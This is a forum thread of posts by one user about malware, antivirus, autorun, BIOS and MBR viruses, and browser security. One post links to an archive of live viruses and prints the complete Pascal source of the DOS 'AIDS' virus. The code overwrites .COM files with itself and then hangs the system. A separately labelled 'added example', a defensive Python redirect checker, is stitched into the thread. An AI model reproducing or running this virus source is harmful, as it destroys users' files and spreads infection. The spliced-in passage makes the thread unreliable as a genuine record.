fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Otacon posted:

A while back I remember having a jpg file that instantly crashed explorer.exe when you viewed the folder it was contained in. If you put it on the desktop, it would crash explorer constantly. If you viewed it in any browser, it would instantly cause an overflow and your system would bluescreen unless you closed it through Procman. I wonder if I saved it...

EDIT Found it. It no longer crashes explorer, but it does cause iexplorer to jump to over 500mb RAM, and firefox to 791mb! Interesting.

I had a corrupted image in a folder full of images on an old hard drive that would crash explorer after a few minutes when explorer worked its way to the file to thumbnail it or something. Sounds like you had/have a similar thing.


fishmech
Jul 16, 2006

by VideoGames
Salad Prong
Autorun should have been disabled with Vista or maybe XP SP2 in my opinion.

It seems strange they plugged various holes, but never autorun.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

TheWevel posted:

Yeah that's weird, I'm on a completely clean machine and got the same result. :confused:

I believe their web server has been hijacked, and depending on the referrer information it will redirect you to the malware site. I know I've read of this elsewhere.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Hillridge posted:

Goddammit I am still getting redirected now and then when clicking links on a google search results page. I've run a few scans and found nothing. I guess I'll just live with it for now.

I'd advise alerting the owners of the sites that they may have been exploited, and posting what sites and search results are giving you redirects.
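Added example, not part of the original posts: one way to check whether a site redirects only visitors who arrive from a search results page, as described in the two posts above. The hostnames, the sample responses and the `sample_fetch` helper are constructed for illustration; a real check would replace `sample_fetch` with an HTTP client that does not follow redirects.

```python
from urllib.parse import urlsplit

# Constructed probe value: a Referer header that looks like a search results page.
SEARCH_REFERER = "https://www.google.com/search?q=example"

# Constructed sample data: (url, referer) -> (HTTP status, Location header).
SAMPLE_RESPONSES = {
    ("http://site-a.example/", None): (200, None),
    ("http://site-a.example/", SEARCH_REFERER): (302, "http://landing.invalid/x"),
    ("http://site-b.example/", None): (301, "http://www.site-b.example/"),
    ("http://site-b.example/", SEARCH_REFERER): (301, "http://www.site-b.example/"),
    ("http://site-c.example/", None): (200, None),
    ("http://site-c.example/", SEARCH_REFERER): (200, None),
}
SITES = ["http://site-a.example/", "http://site-b.example/", "http://site-c.example/"]


def sample_fetch(url, referer):
    """Hypothetical stand-in for an HTTP request made without following redirects."""
    return SAMPLE_RESPONSES[(url, referer)]


def host_of(url):
    """Hostname with a leading 'www.' dropped, so www/non-www count as the same site."""
    host = (urlsplit(url).hostname or "").lower()
    return host[4:] if host.startswith("www.") else host


def check_site(url, fetch=sample_fetch):
    """Compare a direct visit with a visit that carries a search-engine Referer."""
    direct = fetch(url, None)
    via_search = fetch(url, SEARCH_REFERER)
    finding = {"url": url, "direct": direct, "via_search": via_search,
               "suspicious": False, "reason": "same response either way"}
    if direct == via_search:
        return finding
    status, location = via_search
    if 300 <= status < 400 and location and host_of(location) != host_of(url):
        finding["suspicious"] = True
        finding["reason"] = "off-site redirect only with search referer: " + location
    else:
        finding["reason"] = "responses differ, but no off-site redirect"
    return finding


def report(urls, fetch=sample_fetch):
    """Return only the sites worth reporting to their owners."""
    return [f for f in (check_site(u, fetch) for u in urls) if f["suspicious"]]
```

The output of `report` gives the site owner the URL, the referrer that triggers the redirect and where it leads.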

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

ab0z posted:

Actually, it's best not to download stupid poo poo.
I could run NO antivirus software at all, because I don't download crap from limewarez or whatever.

You're precious, really.

I'd like you to think back to 2003 for why this is amusing.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong
I dunno what's going on, I use AVG myself and it isn't giving me any warnings about any page of this thread. I did buy no-ads though.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Cojawfee posted:

Maybe I should just install the bare minimum XP and run everything inside a VM with most of my system resources allocated.

But then if that VM gets infected, all of your stuff is still screwed up.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Ensign Expendable posted:

Pre-SP3 machines can still have autorun disabled by downloading an update.

Or you could use any of a number of registry value tweakers.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

GREAT BOOK OF DICK posted:

I want this virus.

Couldn't find it, but here's a ton of old viruses: http://cd.textfiles.com/thegreatunsorted/live_viruses/

Who else misses nice simple viruses?
code:
AIDS Pascal Source Code


{C-}
{U-}
{I-}       { Wont allow a user break, enable IO check }

{ -- Constants --------------------------------------- }

Const
     VirusSize = 13847;    { AIDS's code size }

     Warning   :String[42]     { Warning message }
     = 'This File Has Been Infected By AIDS! HaHa!';

{ -- Type declarations------------------------------------- }

Type
     DTARec    =Record      { Data area for file search }
     DOSnext  :Array[1..21] of Byte;
                   Attr    : Byte;
                   Ftime,
                   FDate,
                   FLsize,
                   FHsize  : Integer;
                   FullName: Array[1..13] of Char;
                 End;

Registers    = Record    {Register set used for file search }
   Case Byte of
   1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
   2 : (AL,AH,BL,BH,CL,CH,DL,DH          : Byte);
   End;

{ -- Variables--------------------------------------------- }

Var
                               { Memory offset program code }
   ProgramStart : Byte absolute Cseg:$100;
                                          { Infected marker }
   MarkInfected : String[42] absolute Cseg:$180;
   Reg          : Registers;                 { Register set }
   DTA          : DTARec;                       { Data area }
   Buffer       : Array[Byte] of Byte;        { Data buffer }
   TestID       : String[42]; { To recognize infected files }
   UsePath      : String[66];        { Path to search files }
                                    { Lenght of search path }
   UsePathLenght: Byte absolute UsePath;
   Go           : File;                    { File to infect }
   B            : Byte;                              { Used }
   LoopVar      : Integer;  {Will loop forever}

{ -- Program code------------------------------------------ }

Begin
  GetDir(0, UsePath);               { get current directory }
  if Pos('\', UsePath) <> UsePathLenght then
    UsePath := UsePath + '\';
  UsePath := UsePath + '*.COM';        { Define search mask }
  Reg.AH := $1A;                            { Set data area }
  Reg.DS := Seg(DTA);
  Reg.DX := Ofs(DTA);
  MsDos(Reg);
  UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
  Reg.AH := $4E;
  Reg.DS := Seg(UsePath);
  Reg.DX := Ofs(UsePath[1]);
  Reg.CX := $ff;          { Set attribute to find ALL files }
  MsDos(Reg);                   { Find first matching entry }
  IF not Odd(Reg.Flags) Then         { If a file found then }
    Repeat
      UsePath := DTA.FullName;
      B := Pos(#0, UsePath);
      If B > 0 then
      Delete(UsePath, B, 255);             { Remove garbage }
      Assign(Go, UsePath);
      Reset(Go);
      If IOresult = 0 Then          { If not IO error then }
      Begin
        BlockRead(Go, Buffer, 2);
        Move(Buffer[$80], TestID, 43);
                      { Test if file already ill(Infected) }
        If TestID <> Warning Then        { If not then ... }
        Begin
          Seek (Go, 0);
                            { Mark file as infected and .. }
          MarkInfected := Warning;
                                               { Infect it }
          BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
          Close(Go);
          Halt;                   {.. and halt the program }
        End;
        Close(Go);
      End;
        { The file has already been infected, search next. }
      Reg.AH := $4F;
      Reg.DS := Seg(DTA);
      Reg.DX := Ofs(DTA);
      MsDos(Reg);
    {  ......................Until no more files are found }
    Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
  Writeln('');                          {Give a lot of smiles}
Writeln('');
Writeln('     ');
Writeln('                                 ATTENTION:                             ');
Writeln('      I have been elected to inform you that throughout your process of ');
Writeln('      collecting and executing files, you have accidentally HK     ');
Writeln('      yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln('      be; YES, it CAN be, a s has infected your system. Now what do ');
Writeln('      you have to say about that? HAHAHAHA. Have H with this one and ');
Writeln('                       remember, there is NO cure for                   ');
Writeln('                                                                        ');
Writeln('                             ');
Writeln('        ۱     ۱   ۱    ۱    ');
Writeln('        ۱      ۱        ۱        ۱       ۱   ۱          ');
Writeln('        ۱       ۱        ۱        ۱       ۱   ۱             ');
Writeln('        ۱        ۱        ۱       ۱       ');
Writeln('        ۱۱        ۱        ۱       ۱    ۱   ');
Writeln('        ۱       ۱        ۱        ۱       ۱             ۱   ');
Writeln('        ۱       ۱        ۱        ۱      ۱          ۱   ');
Writeln('        ۱       ۱       ۱    ۱   ');
Writeln('                                   ');
Writeln('                                                                        ');
Writeln('     ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Midelne posted:

Last time there was an extensive discussion about PDF exploits, someone got all snooty about not using Adobe Reader and it being an exploit-infested piece of trash. Unfortunately for their argument, it was the day after FoxIt fixed something like a dozen remote code execution vulnerabilities.

If you have software, there are bugs in it. If it's a widespread piece of software, people will attempt to find and exploit those vulnerabilities. The impact of those vulnerabilities -- at least from what I can see -- seems to depend much more on the security infrastructure of the operating system that you're running than the particular version or brand of the software you're using.

All of that said, without any in-depth technical knowledge on the subject I would assume that we're usually looking at Reader-specific exploits when we read about PDF exploits. There are a slew of FoxIt-specific, no doubt, but Reader has achieved market saturation and is a much larger target.

Personally, I prefer using PDF-Xchange Viewer for a PDF reader and simple editor. It's free, has a lot of features that Foxit has started charging for, and has had little to no security exploits discovered. It also loads fast.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Suspicious posted:

http://en.wikipedia.org/wiki/Comic_Sans

The guy made it for children cartoon speech bubbles in MS Bob. It's not his fault every idiot on the planet adopted it as a general use font.

I would rather see every font in the world replaced with comic sans than see another thing that uses Papyrus. At least Comic Sans is legible, if informal.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

thelightguy posted:

There aren't any BIOS level viruses for the x86 platform

Yes there are, but they're very hard to catch and when they activate they tend to just silently wipe the bios during regular usage.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

thelightguy posted:

Not saying I doubt you or anything, but there are so many inconsistencies between BIOSes that it would be impossible to write something that would target more than a relatively small number of systems, since you'd need a different binary image for each motherboard. The Amiga, because of its more standardized architecture had so-called restart proof viruses, which were more or less BIOS level, but not the PC.

The ones I remember seeing tended to target various popular gamer motherboards. It's surprising how popular certain boards would be, but the PC BIOS virus/wiper thing seems to have died off these days, probably because by 2002 or so a lot of motherboard producers that sold primarily to people building stuff themselves started putting anti-BIOS virus stuff in their systems. I have a couple of noname boxes from 2002 or so that a gamer friend of mine gave to me that have "BIOS VIRUS GUARD" which basically locks down the flashing ability on every boot so the only way to flash it is to reboot while holding certain keys down.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

CraigK posted:

I'm just waiting for viruses that can survive a format c:\ *.* /y.

So any virus that is on A, B, or D-Z? :v:

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Ensign Expendable posted:

Well, IE killed browser sales, maybe they're trying to kill antivirus sales?

They're trying to kill lovely "free" antivirus. Their attempt to kill paid antivirus ended back in summer when OneCare was canceled.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

COCKMOUTH.GIF posted:

Outside of a corporate environment, I'm at the point now where if I have to fix someone's computer, I'll clean out the infection and force Google Chrome upon them. Uninstall all Java and Adobe Flash crap, maybe leave the Adobe Reader in there. Chrome can handle pretty much all of that natively so it helps close massive security holes. No product is bulletproof, but I believe forcing people to use Chrome and MSE will help mitigate many disasters once the other products are uninstalled. Obviously this won't work in an enterprise/corporate environment because of the need for Internet Explorer, AD, etc.

It also helps to install an ad-blocking extension for Chrome and teach people how to practice safe computing to an extent. People have been asking me lately about alternatives to LimeWire and I typically tell them to just loving pay for the poo poo. It's not worth the aggravation trying random file-sharing programs/websites and hoping you won't infect yourself.

For what it's worth, Firefox 5 will have a mainstream 64 bit version, and that will be inherently more secure than Chrome which is still 32 bit. Vastly improved Address Space Layout Randomization and so on make 64 bit Windows programs much harder to gently caress with and 64 bit Java and Flash are out and both seem to have much fewer holes as well.

It's a shame that Microsoft doesn't let you force 64 bit IE8/9 to be the default browser though, even that is a shitload more secure, plus the "no tracking" system in 9 is also a quite viable adblock/malware site block system.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong

Factory Factory posted:

The only rootkit variant that gets into the MBR that I know of should have been taken care of by TDSSkiller, though. So, worth a shot, since you'd lose the drive contents RMAing it anyway.

Infected MBR was a common feature with a ton of viruses throughout the 90s and early 2000s.

fishmech
Jul 16, 2006

by VideoGames
Salad Prong
It's fairly trivial to write malware for old old IBM PCs that would tell the hard drive head to repeatedly seek between certain invalid sectors until the arm was stuck and the drive rendered useless.


fishmech
Jul 16, 2006

by VideoGames
Salad Prong

FCKGW posted:

Yeah, malware kits have been around on the Windows side for a while, but this new Mac Defender is from the first kit written for OSX.

I think you probably mean the first publicly available kit. The first Windows kits were kept private and unknown before the first publicly known ones came out.
